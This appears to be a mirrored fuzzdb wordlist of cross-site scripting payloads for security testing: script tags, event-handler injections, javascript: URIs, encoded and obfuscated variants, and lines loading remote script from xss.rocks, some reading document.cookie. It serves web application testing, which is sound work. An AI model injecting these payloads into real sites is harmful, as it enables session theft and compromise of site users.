mirror of
https://github.com/fuzzdb-project/fuzzdb.git
synced 2024-12-01 23:39:09 +00:00
42 lines
2.5 KiB
Text
42 lines
2.5 KiB
Text
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
|
|
http://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
|
|
https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
|
|
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
|
|
&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
|
|
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
|
|
<img src=x:x onerror=alert(1)>
|
|
javascript:alert(1)
|
|
alert(1)
|
|
alert
|
|
alert(1)
|
|
alert(1)
|
|
alert`1`
|
|
alert\\`1\\`
|
|
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
|
<a onmouseover="alert(document.cookie)">xxs link</a>
|
|
<a onmouseover=alert(document.cookie)>xxs link</a>
|
|
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
|
|
<IMG SRC= onmouseover="alert('xxs')">
|
|
<IMG onmouseover="alert('xxs')">
|
|
<img src=x onerror="javascript:alert('XSS')">
|
|
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
|
|
&#39;&#88;&#83;&#83;&#39;&#41;>
|
|
<IMG SRC=javascript:alert('XSS')>
|
|
<IMG SRC=javascript:alert('XSS')>
|
|
<IMG SRC="jav	ascript:alert('XSS');">
|
|
<IMG SRC="jav&#x09;ascript:alert('XSS');">
|
|
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
|
|
<IMG SRC=java%00script:alert(\"XSS\")>
|
|
<IMG SRC="  javascript:alert('XSS');">
|
|
<SCRIPT\s" != "<SCRIPT/XSS\s
|
|
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
|
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
|
<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>
|
|
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
|
<SCRIPT SRC=http://xss.rocks/xss.js?< B >
|
|
<SCRIPT SRC=//xss.rocks/.j>
|
|
<IMG SRC="javascript:alert('XSS')"
|
|
<iframe src=http://xss.rocks/scriptlet.html <
|
|
\";alert('XSS');//
|
|
<SCRIPT SRC="http://xss.rocks/xss.jpg"></SCRIPT>
|
|
javascript:alert%28/xss/%29
|